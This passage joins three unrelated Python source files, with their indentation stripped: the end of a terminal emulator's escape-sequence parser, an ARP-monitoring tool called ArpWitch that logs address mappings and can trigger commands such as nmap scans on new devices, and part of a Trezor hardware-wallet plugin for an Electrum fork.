elif follow == "m": #graphics? more like giraffics!
pass
elif follow == "n":
if coms[0] == 6:
self.write("\x1b[{};{}R".format(self.height - self.row, self.col + 1))
elif follow == "r":#set margins
self.margin_bottom, self.margin_top = self.height - coms[1], self.height - coms[0]
@thread
def act(self, chars, lock):
for char in chars:
lock.acquire(blocking=True)
if char == "\n":
if self.row == self.margin_bottom:
self.insert_line(self.row, "")
else:
self.row -= 1
self.col = 0
elif char == "\r":
self.col = 0
elif char == "":
self.col -= 1
elif char == "":
print("")
elif char == "\t":
self.insert(" " * (8 - self.col % 8))
elif char == "\x1b":
follow = next(chars)
if follow == "[": #CSI
self.csi(chars)
elif follow == "(":
("ESC", "(", next(chars))
elif follow == ")":
("ESC", ")", next(chars))
elif follow == "]": #OSC
coms = [""]
for char in chars:
if char == "":
break
elif char == ";":
coms.append("")
else:
coms[-1] += char
if coms[0] == "0":
self.window.set_caption(coms[1])
elif follow == "=":#application mode
self.modes["application"] = True
elif follow == ">":#application mode
self.modes["application"] = False
elif follow == "M": #reverse line feed
self.remove(self.margin_bottom)#just like IL
elif follow == "7":
self.saved_cursor = (self.row, self.col)
elif follow == "8":
self.row, self.col = self.saved_cursor
else:
print("^[", follow)
self.insert("\x1b" + follow)
continue
else:
self.insert(char)
self.window.invalid = True
self.lock.release()
term = Term(WIDTH, HEIGHT, SIZE)
def format(line):
fin = ""
for ch in line:
if ord(ch) < 32:
fin += "^" + chr(ord(ch) + 64)
else:
fin += ch
return fin
#cProfile.run("term.start()")
term.start()
|
ArpWitch.py
|
import os
import json
import time
import logging
import argparse
import datetime
import subprocess
from arpwitch import LoggerManager
from threading import Thread
try: from ouilookup import OuiLookup
except ModuleNotFoundError: pass
logging.getLogger('scapy.runtime').setLevel(logging.ERROR)
from scapy.all import sniff, ARP
class ArpWitchException(Exception):
pass
class ArpWitch:
VERSION = '2018.1'
SNIFF_BATCH_SIZE = 16
SNIFF_BATCH_TIMEOUT = 2
SAVE_DATA_INTERVAL_DEFAULT = 30
Log = None
OuiLookup = None
meta = {}
ip_data = {}
hw_data = {}
exec_subprocesses = []
save_data_filename = None
save_data_interval_seconds = None
select_all_mapping_events = None
select_new_mapping_events = None
output_to_terminal_ip_events = None
output_to_terminal_hw_events = None
command_exec_ip_events = None
command_exec_hw_events = None
command_exec_run_as_user = None
query_address = None
do_version = None
do_witch = None
debug = None
def __init__(self):
self.arg_parse()
self.Log = LoggerManager.LoggerManager().build_logger(
'arpwitch',
level=logging.INFO,
is_console_quiet=True,
is_console_debug=self.debug
)
try:
self.OuiLookup = OuiLookup()
except NameError:
self.OuiLookup = None
def arg_parse(self):
ArgParse = argparse.ArgumentParser(
prog='arpwitch',
add_help=False,
description='A modern arpwatch tool with JSON formatted oututs and easy options to exec commands when '
'network changes are observed.',
)
ArgParseGroup0 = ArgParse.add_argument_group(title='datafile arguments')
ArgParseGroup0.add_argument(
'-f',
required=False,
type=str,
metavar='<datafile>',
help='The arpwitch datafile - all arp event data is stored in this file in a simpe JSON format making it '
'easy to query and inspect with external tools such as jq - this argument is required.'
)
ArgParseGroup0.add_argument(
'-s',
required=False,
default=self.SAVE_DATA_INTERVAL_DEFAULT,
type=int,
metavar='<seconds>',
help='Seconds interval between datafile write to file - default is {} seconds.'.
format(self.SAVE_DATA_INTERVAL_DEFAULT)
)
ArgParseGroup1 = ArgParse.add_argument_group(
title='ARP mapping event selection arguments',
)
ArgParseGroup1.add_argument(
'-a',
required=False,
default=False,
action='store_true',
help='Select all ARP mapping events packets regardless if they have been previously observed.'
)
ArgParseGroup1.add_argument(
'-n',
required=False,
default=False,
action='store_true',
help='Select only new ARP mapping events that have not been previously observed.'
)
ArgParseGroup2 = ArgParse.add_argument_group(
title='ARP mapping event terminal output arguments',
description='event data is output to <stdout> as one event per line in a JSON format which facilitates '
'easy chaining to other tools, such as jq and others.'
)
ArgParseGroup2.add_argument(
'-i',
required=False,
default=False,
action='store_true',
help='Output to terminal the event data for ip-address (IP) arp packet events.'
)
ArgParseGroup2.add_argument(
'-h',
required=False,
default=False,
action='store_true',
help='Output to terminal the event data for network-hardware (HW) arp packet events.'
)
ArgParseGroup3 = ArgParse.add_argument_group(
title='ARP mapping event command exec arguments',
description='the following exec command data substitutions are available: '
'{IP}=ip-address, '
'{HW}=network-address, '
'{hw}=network-address-short, '
'{TS}=timestamp-utc'
)
ArgParseGroup3.add_argument(
'-I',
required=False,
type=str,
metavar='<command>',
help='Command to exec on ip-address (IP) arp packet events.'
)
ArgParseGroup3.add_argument(
'-H',
required=False,
type=str,
metavar='<command>',
help='Command to exec on network-hardware (HW) arp packet events.'
)
ArgParseGroup3.add_argument(
'-U',
required=False,
type=str,
metavar='<user>',
help='User to exec commands under, if not set this will be the same user that arpwitch is running.'
)
ArgParseGroup4 = ArgParse.add_argument_group(title='optional arguments')
ArgParseGroup4.add_argument(
'-q',
required=False,
type=str,
metavar='<address>',
help='Query the <datafile> for an IP or HW address and return results in JSON formatted output and exit.'
)
ArgParseGroup4.add_argument(
'-v',
required=False,
default=False,
action='store_true',
help='Return the arpwitch version and exit.'
)
ArgParseGroup4.add_argument(
'-w',
required=False,
default=False,
action='store_true',
help='Supply one witch to the terminal and exit.'
)
ArgParseGroup4.add_argument(
'-d',
required=False,
default=False,
action='store_true',
help='Enable debug log output to <stderr> in the terminal.'
)
args = ArgParse.parse_args()
# datafile arguments:
if args.f:
self.save_data_filename = args.f
else:
if args.w is False and args.v is False:
ArgParse.print_help()
print('\n'
'Example #1 : output new ip-address ARP data events\n'
' $ arpwitch -n -f /var/lib/arpwitch/arpwitch.dat -i'
'\n\n'
'Example #2 : invoke nmap on new network-hardware ARP data events\n'
' $ arpwitch -n -f /var/lib/arpwitch/arpwitch.dat -U root -H \'nmap -O \\ \n'
' -T4 -Pn -oN /var/lib/arpwitch/scans/{TS}_{hw}_{IP}.nmap {IP}\''
'\n\n'
'Example #3 : query datafile for ARP event data about an ip-address\n'
' $ arpwitch -f /var/lib/arpwitch/arpwitch.dat -q 192.168.0.1'
'\n'
)
exit(1)
self.save_data_interval_seconds = args.s
# ARP mapping event selection arguments:
self.select_all_mapping_events = args.a
self.select_new_mapping_events = args.n
# ARP mapping event terminal output arguments:
self.output_to_terminal_ip_events = args.i
self.output_to_terminal_hw_events = args.h
# ARP mapping event command exec arguments:
self.command_exec_ip_events = args.I
self.command_exec_hw_events = args.H
self.command_exec_run_as_user = args.U
# optional arguments:
self.query_address = args.q
self.do_version = args.v
self.do_witch = args.w
self.debug = args.d
def main(self):
if self.do_version is True:
print('arpwitch {}'.format(self.VERSION))
exit(0)
if self.do_witch is True:
print(self.witch())
exit(0)
self.data_file_load()
if self.query_address is not None:
print(json.dumps(self.do_query(self.query_address)), flush=True)
exit(0)
if self.OuiLookup is None:
self.Log.warning('OuiLookup package not available to resolve hardware addresses - consider installing via pip')
else:
self.Log.info('Using the OuiLookup package to resolve hardware addresses')
batch_has_new = False
batch_interval_start = time.time()
while True:
subprocess_list_is_updated = False
batch_timestamp = self.timestamp()
batch_packets = []
try:
batch_packets = self.sniff_batch_arp_packets(self.SNIFF_BATCH_SIZE, self.SNIFF_BATCH_TIMEOUT)
except PermissionError:
self.Log.error('arpwitch requires root privilages to sniff network interfaces!')
exit(1)
for packet in batch_packets:
packet_data = self.store_arp_packet_event(packet, timestamp=batch_timestamp)
if len(packet_data) > 0:
if self.select_all_mapping_events is True:
if self.output_to_terminal_hw_events is True:
print(json.dumps({'hw': packet_data['hw']}), flush=True)
if self.output_to_terminal_ip_events is True:
print(json.dumps({'ip': packet_data['ip']}), flush=True)
if self.command_exec_hw_events is not None:
subprocess_list_is_updated = True
self.async_command_exec(
command_line=self.exec_command_line_create('hw', packet_data),
as_user=self.command_exec_run_as_user
)
if self.command_exec_ip_events is not None:
subprocess_list_is_updated = True
self.async_command_exec(
command_line=self.exec_command_line_create('ip', packet_data),
as_user=self.command_exec_run_as_user
)
if self.select_new_mapping_events is True and packet_data['hw']['is_new'] is True:
if self.output_to_terminal_hw_events is True:
print(json.dumps({'hw': packet_data['hw']}), flush=True)
if self.command_exec_hw_events is not None:
subprocess_list_is_updated = True
self.async_command_exec(
command_line=self.exec_command_line_create('hw', packet_data),
as_user=self.command_exec_run_as_user
)
if self.select_new_mapping_events is True and packet_data['ip']['is_new'] is True:
if self.output_to_terminal_ip_events is True:
print(json.dumps({'ip': packet_data['ip']}), flush=True)
if self.command_exec_ip_events is not None:
subprocess_list_is_updated = True
self.async_command_exec(
command_line=self.exec_command_line_create('ip', packet_data),
as_user=self.command_exec_run_as_user
)
# flag batches with new data so data_file_write() can be invoked below
if packet_data['hw']['is_new'] is True or packet_data['ip']['is_new'] is True:
batch_has_new = True
for i, sp in enumerate(self.exec_subprocesses):
if sp.poll() is not None:
self.exec_subprocesses.pop(i)
subprocess_list_is_updated = True
if subprocess_list_is_updated is True:
# NB: race condition here where new processes may have already completed thus resulting in zero value
self.Log.debug('ArpWitch.main() - currently {} active subprocesses'.format(len(self.exec_subprocesses)))
# if self.debug is True:
# print('.', end='', flush=True, file=sys.stderr)
if time.time() > batch_interval_start + self.save_data_interval_seconds:
if batch_has_new is True:
self.data_file_write()
batch_has_new = False
batch_interval_start = time.time()
def store_arp_packet_event(self, packet, timestamp):
packet_data = {}
if packet['ip_src'] != '0.0.0.0':
hw_address = packet['hw_src']
ip_address = packet['ip_src']
hw_address_is_new = False
ip_address_is_new = False
hw_vendor = None
if self.OuiLookup is not None:
hw_vendor = list(self.OuiLookup.query(hw_address)[0].values())[0]
# ip_data
if ip_address not in self.ip_data:
ip_address_is_new = True
self.ip_data[ip_address] = {}
if hw_address not in self.ip_data[ip_address]:
self.ip_data[ip_address][hw_address] = {
'count': 0,
'ts_first': timestamp,
'ts_last': None
}
self.ip_data[ip_address][hw_address]['count'] += 1
self.ip_data[ip_address][hw_address]['ts_last'] = timestamp
if self.OuiLookup is not None:
self.ip_data[ip_address][hw_address]['hw_vendor'] = hw_vendor
# hw_data
if hw_address not in self.hw_data:
hw_address_is_new = True
self.hw_data[hw_address] = {}
if ip_address not in self.hw_data[hw_address]:
self.hw_data[hw_address][ip_address] = {
'count': 0,
'ts_first': timestamp,
'ts_last': None
}
self.hw_data[hw_address][ip_address]['count'] += 1
self.hw_data[hw_address][ip_address]['ts_last'] = timestamp
if self.OuiLookup is not None:
self.hw_data[hw_address]['hw_vendor'] = hw_vendor
packet_data = {
'ip': {ip_address: self.ip_data[ip_address], 'is_new': ip_address_is_new},
'hw': {hw_address: self.hw_data[hw_address], 'is_new': hw_address_is_new},
}
return packet_data
def exec_command_line_create(self, address_type, packet_data):
self.Log.debug('ArpWitch.exec_command_on_new_address({}, {})'.format(address_type, '<packet_data>'))
ip_address = None
hw_address = None
command_line = None
for ip in packet_data['ip'].keys():
if ip != 'is_new':
ip_address = ip
for hw in packet_data['hw'].keys():
if hw != 'is_new':
hw_address = hw
if address_type == 'ip':
command_line = self.command_exec_ip_events.format(
IP=ip_address,
HW=hw_address, hw=hw_address.replace(':',''),
TS=self.timestamp())
elif address_type == 'hw':
command_line = self.command_exec_hw_events.format(
IP=ip_address,
HW=hw_address, hw=hw_address.replace(':',''),
TS=self.timestamp())
else:
raise ArpWitchException('Unsupported address_type', address_type)
return command_line
def async_command_exec(self, command_line, as_user=None):
self.Log.debug('ArpWitch.async_command_exec({}, {})'.format(command_line, as_user))
thread = Thread(target=self.command_exec, args=(command_line, as_user))
thread.start()
def command_exec(self, command_line, as_user=None):
self.Log.debug('ArpWitch.command_exec({}, {})'.format(command_line, as_user))
if as_user is not None:
command_line = 'sudo -u {} {}'.format(as_user, command_line)
self.exec_subprocesses.append(subprocess.Popen(command_line,
shell=True,
stdout=subprocess.DEVNULL,
stderr=subprocess.STDOUT
))
def sniff_batch_arp_packets(self, batch_size, batch_timeout):
packets = []
sniffed_packets = sniff(filter='arp', count=batch_size, timeout=batch_timeout, store=1)
for sniffed_packet in sniffed_packets:
packet = {
'op': None,
'hw_src': None,
'ip_src': None,
'ip_dst': None
}
if sniffed_packet[ARP].op == 1:
packet['op'] = 'ARP_REQ'
elif sniffed_packet[ARP].op == 2:
packet['op'] = 'ARP_REP'
packet['hw_src'] = self.scrub_address('hw',sniffed_packet.sprintf('%ARP.hwsrc%'))
packet['ip_src'] = self.scrub_address('ip',sniffed_packet.sprintf('%ARP.psrc%'))
packet['ip_dst'] = self.scrub_address('ip',sniffed_packet.sprintf('%ARP.pdst%'))
packets.append(packet)
return packets
def data_file_load(self):
self.Log.debug('ArpWitch.data_file_load()')
self.meta = {
'arpwitch': self.VERSION,
'starts': 0,
'ts_first': self.timestamp(),
'ts_last': None,
'hw_count': None,
'ip_count': None,
}
if os.path.isfile(self.save_data_filename):
with open(self.save_data_filename, 'r') as f:
data = json.load(f)
self.meta = data['meta']
self.meta['starts'] += 1
self.ip_data = data['ip']
self.hw_data = data['hw']
self.Log.debug('ArpWitch.data_file_load() - loaded from {}'.format(self.save_data_filename))
else:
self.Log.warn('ArpWitch.data_file_load() - no existing data file found {}'.format(self.save_data_filename))
for meta_field in self.meta:
self.Log.info('{}: {}'.format(meta_field, self.meta[meta_field]))
def data_file_write(self):
self.Log.debug('ArpWitch.data_file_write()')
self.meta['ts_last'] = self.timestamp()
self.meta['hw_count'] = len(self.hw_data)
self.meta['ip_count'] = len(self.ip_data)
with open(self.save_data_filename, 'w') as f:
json.dump({
'meta': self.meta,
'ip': self.ip_data,
'hw': self.hw_data,
}, f)
self.Log.debug('ArpWitch.data_file_write() - written to {}'.format(self.save_data_filename))
def do_query(self, address):
address = address.replace('-',':').lower()
if len(address.split(':')) == 6:
if address in self.hw_data:
return {'hw':{address: self.hw_data[address]}}
else:
if address in self.ip_data:
return {'ip':{address: self.ip_data[address]}}
return {}
def timestamp(self):
return datetime.datetime.utcnow().strftime("%Y%m%dZ%H%M%S")
def scrub_address(self, address_type, address):
if address_type == 'ip':
return ''.join(x for x in address if x in ['.','0','1','2','3','4','5','6','7','8','9'])
elif address_type == 'hw':
return ''.join(x for x in address if x in [':','0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f'])
else:
raise ArpWitchException('unsupported address_type', address_type)
def witch(self):
return \
' \n' \
' \n' \
' % \n' \
' @@ ,@@@@(@, \n' \
' @@@@. @@@@@@@@@@@@@@ \n' \
' @@@@@@@@@@@@@@@@@ \n' \
' @@@@@@@@@@@@@@@ \n' \
' @@@@@@@@@@@@ \n' \
' @@@@@@@@@@@@ \n' \
' .@@@@@@@@@@@@@@ \n' \
' @@@@@@@@@@@@@@@@@* \n' \
' * @@@@@@@@@@@@@ \n' \
' @@@@@@@@@@@@@@@@@@@@@ \n' \
' @@@@@@@@@@@@@@@* \n' \
' @@@@@@@@@@@ %@@@% \n' \
' @@@@ @@@@@@@@@ \n' \
' @@@@ @@@@@@@@@. \n' \
' @@@@/ .@@@@@@@* \n' \
' @@@ @@@@@@@# \n' \
' @@& &@@@@@@@@@@@@@@@@@@@@@@@ \n' \
' @@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@ \n' \
' @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ \n' \
' @@@@@@@@@@@@@@@@@@@@@@@ *@@@@@@@ \n' \
' @@@@@@@@ @@@@@@@@@@ . #@@@@@@@@@@@ \n' \
' @@@@@@@ @ /@@@@@@@@@@@@@@@@@@@@@@@& \n' \
' .@@@(@@@ /@@@@@@@@@@@@@@@@@@@@ \n' \
' &@@@ @@@ @@@@@@@@@@@@@@@@@@ \n' \
' @@@@ &@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@, \n' \
' @@@. @@@@@ @@@@@@@@@@@@@@@@@@@@@@ \n' \
' &@@ &@@@@ #@@# (@@@@@@@@@& \n' \
' @@@@@ @@@ \n' \
' @@@@@ \n' \
' @@@@ \n' \
' @@@ \n' \
' %@ \n' \
' \n' \
|
trezor.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum_ganja.util import bfh, bh2u, versiontuple, UserCancelled
from electrum_ganja.ganja import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT, is_address)
from electrum_ganja import constants
from electrum_ganja.i18n import _
from electrum_ganja.plugins import BasePlugin, Device
from electrum_ganja.transaction import deserialize, Transaction
from electrum_ganja.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey, xtype_from_derivation
from electrum_ganja.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(0, 2)
# script "generation"
SCRIPT_GEN_LEGACY, SCRIPT_GEN_P2SH_SEGWIT, SCRIPT_GEN_NATIVE_SEGWIT = range(0, 3)
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = 'TREZOR'
def get_derivation(self):
return self.derivation
def get_script_gen(self):
xtype = xtype_from_derivation(self.derivation)
if xtype in ('p2wpkh', 'p2wsh'):
return SCRIPT_GEN_NATIVE_SEGWIT
elif xtype in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return SCRIPT_GEN_P2SH_SEGWIT
else:
return SCRIPT_GEN_LEGACY
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://github.com/trezor/python-trezor'
minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 9, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
# Minimal test if python-trezor is installed
import trezorlib
try:
library_version = trezorlib.__version__
except AttributeError:
# python-trezor only introduced __version__ in 0.9.0
library_version = 'unknown'
if library_version == 'unknown' or \
versiontuple(library_version) < self.minimum_library:
self.libraries_available_message = (
_("Library version for '{}' is too old.").format(name)
+ '\nInstalled: {}, Needed: {}'
.format(library_version, self.minimum_library))
self.print_stderr(self.libraries_available_message)
raise ImportError()
self.libraries_available = True
except ImportError:
self.libraries_available = False
return
from . import client
from . import transport
import trezorlib.ckd_public
import trezorlib.messages
self.client_class = client.TrezorClient
self.ckd_public = trezorlib.ckd_public
self.types = trezorlib.messages
self.DEVICE_IDS = ('TREZOR',)
self.transport_handler = transport.TrezorTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(d.get_path(), -1, d.get_path(), 'TREZOR', 0) for d in devices]
def create_client(self, device, handler):
try:
self.print_error("connecting to device at", device.path)
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.print_error("cannot connect at", device.path, str(e))
return None
if not transport:
self.print_error("cannot connect at", device.path)
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Ganjacoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
model = client.get_trezor_model()
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, model)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection, recovery_type = settings
if method == TIM_RECOVER and recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
if recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
recovery_type_trezor = self.types.RecoveryDeviceType.ScrambledWords
else:
recovery_type_trezor = self.types.RecoveryDeviceType.Matrix
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language,
type=recovery_type_trezor)
if recovery_type == RECOVERY_TYPE_MATRIX:
handler.close_matrix_dialog()
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise Exception(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, script_gen, is_multisig):
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
return self.types.InputScriptType.SPENDWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
return self.types.InputScriptType.SPENDP2SHWITNESS
else:
if is_multisig:
return self.types.InputScriptType.SPENDMULTISIG
else:
return self.types.InputScriptType.SPENDADDRESS
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True, keystore.get_script_gen())
outputs = self.tx_outputs(keystore.get_derivation(), tx, keystore.get_script_gen())
signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
raw = bh2u(signed_tx)
tx.update_signatures(raw)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_gen = keystore.get_script_gen()
script_type = self.get_trezor_input_script_type(script_gen, is_multisig=False)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=[change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_gen = keystore.get_script_gen()
script_type = self.get_trezor_input_script_type(script_gen, is_multisig=True)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False, script_gen=SCRIPT_GEN_LEGACY):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
txinputtype.script_type = self.get_trezor_input_script_type(script_gen, is_multisig=False)
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
script_type = self.get_trezor_input_script_type(script_gen, is_multisig=True)
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx, script_gen=SCRIPT_GEN_LEGACY):
def create_output_by_derivation(info):
index, xpubs, m = info
if len(xpubs) == 1:
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS
else:
script_type = self.types.OutputScriptType.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS
else:
script_type = self.types.OutputScriptType.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d" % index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
